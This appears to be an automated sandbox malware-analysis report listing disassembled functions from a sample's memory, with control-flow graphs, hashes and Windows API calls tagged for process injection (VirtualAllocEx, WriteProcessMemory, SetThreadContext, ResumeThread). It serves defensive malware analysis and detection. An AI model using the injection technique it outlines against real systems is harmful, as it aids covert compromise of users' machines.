                                                                control_flow_graph 706 9fb8c2-9fb8df 707 9fb90b-9fb90f 706->707 708 9fb8e1-9fb8ee call 9fb294 706->708 710 9fb923-9fb964 707->710 711 9fb911-9fb91b 707->711 714 9fb904 708->714 715 9fb8f0 708->715 717 9fb966-9fb96e 710->717 718 9fb971-9fb97f 710->718 711->710 714->707 764 9fb8f6 call 9fbb68 715->764 765 9fb8f6 call 9fbb66 715->765 717->718 719 9fb9a3-9fb9a5 718->719 720 9fb981-9fb986 718->720 725 9fb9a8-9fb9af 719->725 722 9fb988-9fb98f call 9fb2a0 720->722 723 9fb991 720->723 721 9fb8fc-9fb8fe 721->714 724 9fba40-9fbb00 721->724 727 9fb993-9fb9a1 722->727 723->727 757 9fbb08-9fbb33 GetModuleHandleW 724->757 758 9fbb02-9fbb05 724->758 728 9fb9bc-9fb9c3 725->728 729 9fb9b1-9fb9b9 725->729 727->725 732 9fb9c5-9fb9cd 728->732 733 9fb9d0-9fb9d9 call 9fb2b0 728->733 729->728 732->733 737 9fb9db-9fb9e3 733->737 738 9fb9e6-9fb9eb 733->738 737->738 739 9fb9ed-9fb9f4 738->739 740 9fba09-9fba0d 738->740 739->740 742 9fb9f6-9fba06 call 9fb2c0 call 9fb2d0 739->742 762 9fba10 call 9fbe5a 740->762 763 9fba10 call 9fbe68 740->763 742->740 745 9fba13-9fba16 747 9fba39-9fba3f 745->747 748 9fba18-9fba36 745->748 748->747 759 9fbb3c-9fbb50 757->759 760 9fbb35-9fbb3b 757->760 758->757 760->759 762->745 763->745 764->721 765->721
                                                                APIs
                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 009FBB26
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1499606658.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_9f0000_DESCRIPTION.jbxd
                                                                Similarity
                                                                • API ID: HandleModule
                                                                • String ID:
                                                                • API String ID: 4139908857-0
                                                                • Opcode ID: 0cf3d8183f44328e33d57fca77e31cc7db26f889a41857de8fa47f971426c106
                                                                • Instruction ID: 389baa72fa7f44156139ba82927223215e247bda6d80640ca32a92d54d62cc9d
                                                                • Opcode Fuzzy Hash: 0cf3d8183f44328e33d57fca77e31cc7db26f889a41857de8fa47f971426c106
                                                                • Instruction Fuzzy Hash: 75817870A00B098FD724DF6AD44176ABBF5FF88304F00892DD69ADBA50E774E946CB91
                                                                Function 009F5D0C Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 766 9f5d0c-9f5dd9 CreateActCtxA 768 9f5ddb-9f5de1 766->768 769 9f5de2-9f5e3c 766->769 768->769 776 9f5e3e-9f5e41 769->776 777 9f5e4b-9f5e4f 769->777 776->777 778 9f5e51-9f5e5d 777->778 779 9f5e60 777->779 778->779 780 9f5e61 779->780 780->780
                                                                APIs
                                                                • CreateActCtxA.KERNEL32(?), ref: 009F5DC9
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1499606658.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_9f0000_DESCRIPTION.jbxd
                                                                Similarity
                                                                • API ID: Create
                                                                • String ID:
                                                                • API String ID: 2289755597-0
                                                                • Opcode ID: ba20782ffb329bf2ad96ebbb2ff7c9481a686f4df733a1fc8e4da76d67a25a51
                                                                • Instruction ID: 3d1f8644479814afa912265cdd996bf3105642ce93ce04a53c3ade9081ab9c07
                                                                • Opcode Fuzzy Hash: ba20782ffb329bf2ad96ebbb2ff7c9481a686f4df733a1fc8e4da76d67a25a51
                                                                • Instruction Fuzzy Hash: BF41EDB0C0171DCFDB24DFAAC84479EBBB6BF88704F20806AD518AB251DB756946CF90
                                                                Function 009F454C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 782 9f454c-9f5dd9 CreateActCtxA 785 9f5ddb-9f5de1 782->785 786 9f5de2-9f5e3c 782->786 785->786 793 9f5e3e-9f5e41 786->793 794 9f5e4b-9f5e4f 786->794 793->794 795 9f5e51-9f5e5d 794->795 796 9f5e60 794->796 795->796 797 9f5e61 796->797 797->797
                                                                APIs
                                                                • CreateActCtxA.KERNEL32(?), ref: 009F5DC9
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1499606658.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_9f0000_DESCRIPTION.jbxd
                                                                Similarity
                                                                • API ID: Create
                                                                • String ID:
                                                                • API String ID: 2289755597-0
                                                                • Opcode ID: 36f5c594b24f698811f5c3f7ebe457e447c563274418b925ec04a9dad8baf854
                                                                • Instruction ID: 0a7e184da05043faac46eab9ce82cf9884539d08ac7969fcecaeab3652c9bdc1
                                                                • Opcode Fuzzy Hash: 36f5c594b24f698811f5c3f7ebe457e447c563274418b925ec04a9dad8baf854
                                                                • Instruction Fuzzy Hash: 8E41EF70C0071DCFEB24DFAAC844B9EBBB5BF88704F20806AD518AB251DBB56945CF90
                                                                Function 06993B18 Relevance: 1.6, APIs: 1, Instructions: 74COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 799 6993b18-6993b6c 801 6993b6e-6993b74 799->801 802 6993b77-6993b86 799->802 801->802 803 6993b88 802->803 804 6993b8b-6993bc4 DrawTextExW 802->804 803->804 805 6993bcd-6993bea 804->805 806 6993bc6-6993bcc 804->806 806->805
                                                                APIs
                                                                • DrawTextExW.USER32(?,?,?,?,?,?), ref: 06993BB7
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1519169052.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_6990000_DESCRIPTION.jbxd
                                                                Similarity
                                                                • API ID: DrawText
                                                                • String ID:
                                                                • API String ID: 2175133113-0
                                                                • Opcode ID: 0a8c9212cf61820d011b88581211122537537001effd31f2ebeae1a55a7040a6
                                                                • Instruction ID: 1a98199df1f46d43d4aef9c67012cd9d96c3595cc3d0beb5b94dc9d5428e46e5
                                                                • Opcode Fuzzy Hash: 0a8c9212cf61820d011b88581211122537537001effd31f2ebeae1a55a7040a6
                                                                • Instruction Fuzzy Hash: 1D31B2B5D007099FDB10CF9AD880AEEFBF9FB48320F24842AE519A7610D775A545CFA0
                                                                Function 0699F35A Relevance: 1.6, APIs: 1, Instructions: 73injectionCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 809 699f35a-699f3ae 812 699f3be-699f3fd WriteProcessMemory 809->812 813 699f3b0-699f3bc 809->813 815 699f3ff-699f405 812->815 816 699f406-699f436 812->816 813->812 815->816
                                                                APIs
                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0699F3F0
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1519169052.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_6990000_DESCRIPTION.jbxd
                                                                Similarity
                                                                • API ID: MemoryProcessWrite
                                                                • String ID:
                                                                • API String ID: 3559483778-0
                                                                • Opcode ID: f21dd0150fc7c9005d7ecb9b9bea57ce6a0768b06fc52bbc6884a8ecee43a57f
                                                                • Instruction ID: a31ef821c83f16495e88d92197139fe8eb8f23edefb8768043d7792501711a89
                                                                • Opcode Fuzzy Hash: f21dd0150fc7c9005d7ecb9b9bea57ce6a0768b06fc52bbc6884a8ecee43a57f
                                                                • Instruction Fuzzy Hash: 2A2146719003099FDF10CFAAC881BEEBBF5FF48320F10842AE919A7240C7789941CBA0
                                                                Function 06993B20 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 820 6993b20-6993b6c 821 6993b6e-6993b74 820->821 822 6993b77-6993b86 820->822 821->822 823 6993b88 822->823 824 6993b8b-6993bc4 DrawTextExW 822->824 823->824 825 6993bcd-6993bea 824->825 826 6993bc6-6993bcc 824->826 826->825
                                                                APIs
                                                                • DrawTextExW.USER32(?,?,?,?,?,?), ref: 06993BB7
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1519169052.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_6990000_DESCRIPTION.jbxd
                                                                Similarity
                                                                • API ID: DrawText
                                                                • String ID:
                                                                • API String ID: 2175133113-0
                                                                • Opcode ID: d9aec9c133be7d76ad074c7eed489e60404abb05df763cd317491c33b6c395cb
                                                                • Instruction ID: c341e75173cb8f4461243d393ab8d4a9cb0a10ce3e42d10c304c17f8fc6fada5
                                                                • Opcode Fuzzy Hash: d9aec9c133be7d76ad074c7eed489e60404abb05df763cd317491c33b6c395cb
                                                                • Instruction Fuzzy Hash: D721C4B5D003099FDB10CF9AD880AEEBBF9FB48220F14842AE519A7610D775A544CFA0
                                                                Function 0699F360 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 829 699f360-699f3ae 831 699f3be-699f3fd WriteProcessMemory 829->831 832 699f3b0-699f3bc 829->832 834 699f3ff-699f405 831->834 835 699f406-699f436 831->835 832->831 834->835
                                                                APIs
                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0699F3F0
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1519169052.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_6990000_DESCRIPTION.jbxd
                                                                Similarity
                                                                • API ID: MemoryProcessWrite
                                                                • String ID:
                                                                • API String ID: 3559483778-0
                                                                • Opcode ID: fb981c001e8fbfcd2c3ec7a5b5d2477fc4f5fb4f6239db29980919f2ca81cf8c
                                                                • Instruction ID: 78f0832c44f1d71390bab7964b4ba1751047b1af4993b16798708a4c5dd8b34f
                                                                • Opcode Fuzzy Hash: fb981c001e8fbfcd2c3ec7a5b5d2477fc4f5fb4f6239db29980919f2ca81cf8c
                                                                • Instruction Fuzzy Hash: A82124719003499FDF10DFAAC885BEEBBF5FF48310F14842AE959A7240C7789944DBA0
                                                                Function 009FDDA0 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 839 9fdda0-9fdda6 840 9fdda8-9fde3c DuplicateHandle 839->840 841 9fde3e-9fde44 840->841 842 9fde45-9fde62 840->842 841->842
                                                                APIs
                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,009FDD6E,?,?,?,?,?), ref: 009FDE2F
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1499606658.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_9f0000_DESCRIPTION.jbxd
                                                                Similarity
                                                                • API ID: DuplicateHandle
                                                                • String ID:
                                                                • API String ID: 3793708945-0
                                                                • Opcode ID: 97f034618982c0010be59c234a608a4254a5432f4fb37dcc25784268db203fc3
                                                                • Instruction ID: f7a1e09fc5e22cec90db9ce1db187585e153a9e630837b913b929639932bcdb2
                                                                • Opcode Fuzzy Hash: 97f034618982c0010be59c234a608a4254a5432f4fb37dcc25784268db203fc3
                                                                • Instruction Fuzzy Hash: 9821E7B590130D9FDB10CF9AD884ADEBBF9EB48320F14841AE914A7350D374A941CF61
                                                                Function 009FD678 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 845 9fd678-9fde3c DuplicateHandle 847 9fde3e-9fde44 845->847 848 9fde45-9fde62 845->848 847->848
                                                                APIs
                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,009FDD6E,?,?,?,?,?), ref: 009FDE2F
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1499606658.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_9f0000_DESCRIPTION.jbxd
                                                                Similarity
                                                                • API ID: DuplicateHandle
                                                                • String ID:
                                                                • API String ID: 3793708945-0
                                                                • Opcode ID: fc366715f78684ab55fa87d422a22ab45c72700eb6fb0cb4cb9a54a4cf76a935
                                                                • Instruction ID: b0d61ccada385000b39cd967994964628757422b1d8fa45e7e584c6b371cccec
                                                                • Opcode Fuzzy Hash: fc366715f78684ab55fa87d422a22ab45c72700eb6fb0cb4cb9a54a4cf76a935
                                                                • Instruction Fuzzy Hash: B021E7B590130D9FDB10CF9AD484AEEBFF9EB48310F14841AE954A7350D374A950CFA0
                                                                Function 0699F450 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 859 699f450-699f4dd ReadProcessMemory 862 699f4df-699f4e5 859->862 863 699f4e6-699f516 859->863 862->863
                                                                APIs
                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0699F4D0
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1519169052.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_6990000_DESCRIPTION.jbxd
                                                                Similarity
                                                                • API ID: MemoryProcessRead
                                                                • String ID:
                                                                • API String ID: 1726664587-0
                                                                • Opcode ID: 8f562505f18729bfb7e6b7199d752ac21a247a54770c6fbd9513fdc18ab97576
                                                                • Instruction ID: 0fdcd87e6a2149dd45f5823cef4830dacb0ed83e4ddec07b81f9b0d2e0e0410a
                                                                • Opcode Fuzzy Hash: 8f562505f18729bfb7e6b7199d752ac21a247a54770c6fbd9513fdc18ab97576
                                                                • Instruction Fuzzy Hash: C52103718003499FDB10DFAAC884BEEBBF5FF48320F10842AE559A7240C7799900DBA0
                                                                Function 0699F449 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 851 699f449-699f4dd ReadProcessMemory 854 699f4df-699f4e5 851->854 855 699f4e6-699f516 851->855 854->855
                                                                APIs
                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0699F4D0
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1519169052.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_6990000_DESCRIPTION.jbxd
                                                                Similarity
                                                                • API ID: MemoryProcessRead
                                                                • String ID:
                                                                • API String ID: 1726664587-0
                                                                • Opcode ID: f9eef624c39f2a866a8e37e60a5b5b6dec163b8aba968783acad48d972869fc6
                                                                • Instruction ID: a6e360f84edc8a1d59ca6bc306c9ee6da55f5664eb2e5bdbcea040421b1e1e5e
                                                                • Opcode Fuzzy Hash: f9eef624c39f2a866a8e37e60a5b5b6dec163b8aba968783acad48d972869fc6
                                                                • Instruction Fuzzy Hash: 5921F4B1D0034A9FDB10DFAAC8847EEFBF5BF48310F50882AE559A7640C7789541DBA0
                                                                Function 069CFA30 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 867 69cfa30-69cfa7b 869 69cfa7d-69cfa89 867->869 870 69cfa8b-69cfabb Wow64SetThreadContext 867->870 869->870 872 69cfabd-69cfac3 870->872 873 69cfac4-69cfaf4 870->873 872->873
                                                                APIs
                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 069CFAAE
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1519914929.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_69c0000_DESCRIPTION.jbxd
                                                                Similarity
                                                                • API ID: ContextThreadWow64
                                                                • String ID:
                                                                • API String ID: 983334009-0
                                                                • Opcode ID: d017ababcd2eddd382bfe4f6bb8c5f26011255e53a0a125a0d9083c4f14cf157
                                                                • Instruction ID: 07a98a0c50bc0a8f00f9b5d15be403ee07efc773d165c5b92286ff17595bfba0
                                                                • Opcode Fuzzy Hash: d017ababcd2eddd382bfe4f6bb8c5f26011255e53a0a125a0d9083c4f14cf157
                                                                • Instruction Fuzzy Hash: 6C213771D003098FDB10DFAAC4857AEBBF5AF88320F14842ED559A7240DB789945CFA5
                                                                Function 069CFA2A Relevance: 1.6, APIs: 1, Instructions: 61threadCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 877 69cfa2a-69cfa7b 879 69cfa7d-69cfa89 877->879 880 69cfa8b-69cfa8e 877->880 879->880 881 69cfa95-69cfabb Wow64SetThreadContext 880->881 882 69cfabd-69cfac3 881->882 883 69cfac4-69cfaf4 881->883 882->883
                                                                APIs
                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 069CFAAE
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1519914929.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_69c0000_DESCRIPTION.jbxd
                                                                Similarity
                                                                • API ID: ContextThreadWow64
                                                                • String ID:
                                                                • API String ID: 983334009-0
                                                                • Opcode ID: 19e294e20758209be6de5a370bd8b60a5951ca1fd91ce8433b7cc37b7ce5bd05
                                                                • Instruction ID: f804a3d8e5cdd264ab8840bb00e72227fa6c77a811526e6e1673794555a1191c
                                                                • Opcode Fuzzy Hash: 19e294e20758209be6de5a370bd8b60a5951ca1fd91ce8433b7cc37b7ce5bd05
                                                                • Instruction Fuzzy Hash: 9F21347190030A8FDB50CFA9C4817EEBBF5AF88324F24842ED559AB280CB799545CFA4
                                                                Function 0699F298 Relevance: 1.6, APIs: 1, Instructions: 54memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0699F30E
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1519169052.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_6990000_DESCRIPTION.jbxd
                                                                Similarity
                                                                • API ID: AllocVirtual
                                                                • String ID:
                                                                • API String ID: 4275171209-0
                                                                • Opcode ID: 6f613086a79ad7d9a411d25c2a94c6730d7e1662d37226f5ced786c0ce3f0e6c
                                                                • Instruction ID: e80c2d691de1ab11e4f077929e21fb3ffa0cde71d6d353bbc1f225ab4ea78f8e
                                                                • Opcode Fuzzy Hash: 6f613086a79ad7d9a411d25c2a94c6730d7e1662d37226f5ced786c0ce3f0e6c
                                                                • Instruction Fuzzy Hash: 3F21447190434A8FDF10CFA9C8817DEBFF1AF88310F24885AD559A7251C7799541CBA1
                                                                Function 0699F2A0 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0699F30E
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1519169052.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_6990000_DESCRIPTION.jbxd
                                                                Similarity
                                                                • API ID: AllocVirtual
                                                                • String ID:
                                                                • API String ID: 4275171209-0
                                                                • Opcode ID: 28c21821ec4087bb0b421d9e986c1c1a9736019c1c6a6bfa73b2716c1fdb8da4
                                                                • Instruction ID: 2928c5850551f99f903b5a92d423e1df706301c196e429454cedb8caa506b9e8
                                                                • Opcode Fuzzy Hash: 28c21821ec4087bb0b421d9e986c1c1a9736019c1c6a6bfa73b2716c1fdb8da4
                                                                • Instruction Fuzzy Hash: 331126719003499FDF10DFAAC845BDEBBF5EF88720F248819E519A7250C7799940DFA1
                                                                Function 069CF97A Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1519914929.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_69c0000_DESCRIPTION.jbxd
                                                                Similarity
                                                                • API ID: ResumeThread
                                                                • String ID:
                                                                • API String ID: 947044025-0
                                                                • Opcode ID: fdba5e00a8069fb6e1c8b8374f888229f4c459c6f1b813919715fd27c2c4b3a1
                                                                • Instruction ID: d8fd7900383f55d2c61657ba265e036c1e0c61005f40656e9bf16e819c27973a
                                                                • Opcode Fuzzy Hash: fdba5e00a8069fb6e1c8b8374f888229f4c459c6f1b813919715fd27c2c4b3a1
                                                                • Instruction Fuzzy Hash: 0F115571C003498FDB20DFAAC8447EEBBF5AF88320F24881AD019A7640CB799941CBA0
                                                                Function 069CF980 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1519914929.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_69c0000_DESCRIPTION.jbxd
                                                                Similarity
                                                                • API ID: ResumeThread
                                                                • String ID:
                                                                • API String ID: 947044025-0
                                                                • Opcode ID: 6710d99ae04d564009ad271e37954938e0a7eee9170ed245bda045e8465aadc3
                                                                • Instruction ID: 7d44914390d5e991cbd26ae18c8e0422cbfdf60fe0499fe2418f36f12b6b18f6
                                                                • Opcode Fuzzy Hash: 6710d99ae04d564009ad271e37954938e0a7eee9170ed245bda045e8465aadc3
                                                                • Instruction Fuzzy Hash: 3A112871D003498FDB20DFAAC8457AEFBF9AF88620F24841AD559A7240CB75A944CB91
                                                                Function 009FBAC0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 009FBB26
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1499606658.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_9f0000_DESCRIPTION.jbxd
                                                                Similarity
                                                                • API ID: HandleModule
                                                                • String ID:
                                                                • API String ID: 4139908857-0
                                                                • Opcode ID: c5eb5b655981cb082852944e6aed3b8e96c5171628edbc0c2d3d0fa2f06904db
                                                                • Instruction ID: 89166bb6b63de5b51fddcc28e09d4b5f390714f237e414ef4f1381530a73ddfa
                                                                • Opcode Fuzzy Hash: c5eb5b655981cb082852944e6aed3b8e96c5171628edbc0c2d3d0fa2f06904db
                                                                • Instruction Fuzzy Hash: 3E11DFB5C003498FDB20DF9AD844AAEFBF8AB88321F14841AD529A7614C379A545CFA1
                                                                Function 04B7FB38 Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1515824403.0000000004B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_4b70000_DESCRIPTION.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: @
                                                                • API String ID: 0-2766056989
                                                                • Opcode ID: 02471be61a2e1869a1bcaed39c61fabbe21aa67dc22135f96c345dfeb72ee2f1
                                                                • Instruction ID: 21d64d7cc8f5cc635fca723ab8c0136420e226eb1f9c9fbaae4eda34bf8d0102
                                                                • Opcode Fuzzy Hash: 02471be61a2e1869a1bcaed39c61fabbe21aa67dc22135f96c345dfeb72ee2f1
                                                                • Instruction Fuzzy Hash: AB21D130B04355CFDF26ABB898505BF7BE6DF85214B0440EAE808DB352DA35DD85C7A1
                                                                Function 04B74B7A Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1515824403.0000000004B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_4b70000_DESCRIPTION.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Jn^
                                                                • API String ID: 0-4125223902
                                                                • Opcode ID: 3005c6480f4f2e6df5beba9925dabdce6446546b88852e3ce74e5600393082fa
                                                                • Instruction ID: 4798ec3d507c9b57f652a81517cb4a52663a45328070b90d1716d987b8314ff8
                                                                • Opcode Fuzzy Hash: 3005c6480f4f2e6df5beba9925dabdce6446546b88852e3ce74e5600393082fa
                                                                • Instruction Fuzzy Hash: 06E068313082108FC349E738D4A492B3BDAAFCA22431048EAD00ACB330CD31EC028796
                                                                Function 04B7F4A0 Relevance: .2, Instructions: 210COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1515824403.0000000004B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_4b70000_DESCRIPTION.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e7f4106734b5e62a37f464af382f167b8dfdfb7c7a41172d28d3d00a031913f1
                                                                • Instruction ID: fa560af46f9009cf6ea7ed567a47561bfdbde5c67ad8b8dc41be27c26efd1396
                                                                • Opcode Fuzzy Hash: e7f4106734b5e62a37f464af382f167b8dfdfb7c7a41172d28d3d00a031913f1
                                                                • Instruction Fuzzy Hash: DD818235A10209DFCB04EFA4D8989EDBBB5FF89300F158599E512AB364EB70E945CF90
                                                                Function 04B7D838 Relevance: .2, Instructions: 183COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1515824403.0000000004B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_4b70000_DESCRIPTION.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4a0a86db5b6ee62e392302487d3cd97fbb891202381a9e4cdc50ef1d0d509656
                                                                • Instruction ID: eaa5ce1284e06d8b381ebc16e6c26b61f9695cfceee0b91eb9e3744cb77e146a
                                                                • Opcode Fuzzy Hash: 4a0a86db5b6ee62e392302487d3cd97fbb891202381a9e4cdc50ef1d0d509656
                                                                • Instruction Fuzzy Hash: B371AC30E002098FDB04EFA9C8586ADBBB5FF88340F1085AAD526B7391EB34A945CB50
                                                                Function 04B7F304 Relevance: .2, Instructions: 181COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1515824403.0000000004B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_4b70000_DESCRIPTION.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 17e66ca84d838d682803e7e5423928364e5970a82d0cf9c5bd0419265063b8c7
                                                                • Instruction ID: 11dac9266b02c10ec462ed0e814748368c9e4b08a033c37595e3bbc934a3ec0e
                                                                • Opcode Fuzzy Hash: 17e66ca84d838d682803e7e5423928364e5970a82d0cf9c5bd0419265063b8c7
                                                                • Instruction Fuzzy Hash: AF617C71E003188FDB14DFA9C854BAEBBF5FF88710F14845AE825AB351DB74A805CB95
                                                                Function 04B7B690 Relevance: .2, Instructions: 168COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1515824403.0000000004B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_4b70000_DESCRIPTION.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: bf3222d25f5b90f4c75f4a120b43fe21dea6d395634cf533e05d9d425f70e8db
                                                                • Instruction ID: ccd5d94846dda28b4a2984090d9b68d48a9ed7c3b152ff5c6ec539f1042d1645
